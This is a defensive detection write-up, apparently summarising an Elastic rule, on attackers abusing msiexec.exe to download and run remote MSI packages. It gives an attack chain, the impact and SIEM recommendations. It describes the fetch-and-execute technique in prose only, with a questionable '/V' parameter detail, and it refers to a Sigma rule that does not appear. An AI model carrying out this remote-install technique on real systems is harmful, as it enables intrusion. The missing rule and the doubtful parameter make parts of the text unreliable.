Potential Remote File Execution via MSIEXEC

The Windows Installer (msiexec.exe) is a built-in Windows component used for installing, modifying, and removing software. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files, bypassing security controls and potentially leading to initial access or defense evasion. This activity is often part of a broader attack chain, used to deliver and execute malicious payloads. The detection rule provided by Elastic identifies suspicious msiexec.exe activity by monitoring process starts, network connections, and child processes. It filters out known benign signatures and paths to highlight potential misuse. This detection is designed to work with Elastic Defend data.

Attack Chain

1. An attacker gains initial access via phishing (T1566) or other means to execute commands on the target system.
2. The attacker uses msiexec.exe with the /V parameter to initiate the installation of a remote MSI package. This allows the attacker to bypass typical execution restrictions.
3. Msiexec.exe attempts a network connection (T1105) to retrieve the remote MSI package from a malicious server.
4. Msiexec.exe spawns a child process to handle the installation of the downloaded MSI package.
5. The spawned child process executes malicious code embedded within the MSI package.
6. The malicious code performs actions such as installing malware, modifying system settings, or establishing persistence.
7. The attacker leverages the compromised system for further lateral movement or data exfiltration.

Impact

Successful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and further compromise of the affected system and network. While this specific rule has a low risk score, it can be an early indicator of more serious attacks. It is crucial to investigate any alerts generated by this rule to determine the full scope and impact of the potential compromise.

Recommendation

• Deploy the Sigma rule provided below to your SIEM to detect suspicious usage of msiexec.exe to install remote packages. Tune the rule for your environment by adding exceptions for legitimate software installation processes.
• Enable process monitoring and network connection logging on Windows endpoints to provide the necessary data for the Sigma rule to function effectively (Data Source: Elastic Defend).
• Review the “Possible investigation steps” section in the Elastic rule’s documentation to investigate potential false positives and legitimate uses of msiexec.exe.
• Implement application control policies to restrict the execution of unauthorized applications, including potentially malicious MSI packages.